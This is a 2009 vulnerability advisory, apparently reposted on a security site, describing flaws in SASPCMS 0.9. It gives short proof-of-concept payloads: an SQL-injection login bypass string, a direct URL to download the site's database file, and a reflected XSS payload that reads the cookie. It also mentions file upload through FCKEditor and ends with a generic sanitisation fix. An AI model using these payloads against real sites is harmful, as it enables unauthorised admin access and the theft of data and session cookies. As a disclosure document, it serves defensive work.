SASPCMS Multiple Vulnerabilities

2009.04.09
Credit: bugreport
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

##########################www.BugReport.ir######################################## # # AmnPardaz Security Research Team # # Title: SASPCMS Multiple Vulnerabilities # Vendor: http://www.lgasoft.com # Vulnerable Version: 0.9 (prior versions also may be affected) # Exploitation: Remote with browser # Fix: N/A ################################################################################### #################### - Description: #################### SASPCMS is an ASP Content Management System . SASPCMS witch uses MSSQL & Microsoft Access as backend database. #################### - Vulnerability: #################### +-->Authentication Bypass POC: ' or ''=' http://[URL]/saspcms/admin/default.asp +-->Database Information Disclosure POC: http://[URL]/saspcms/db/menu.mdb +-->Cross Site Scripting (XSS). Reflected XSS attack in "default.asp" in "q" parameter. POC: http://[URL]/saspcms/default.asp?q=<script>alert(document.cookie)</script> #################### - PoC: #################### It's possible for remote attackers to upload arbitrary files by using FCKEditor after login to admin area. http://www.bugreport.ir/64/exploit.htm #################### - Solution: #################### Edit the source code to ensure that inputs are properly sanitized. #################### - Credit: #################### AmnPardaz Security Research & Penetration Testing Group Contact: admin[4t}bugreport{d0t]ir www.BugReport.ir www.AmnPardaz.com

References:

http://seclists.org/bugtraq/2009/Apr/0074.html


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top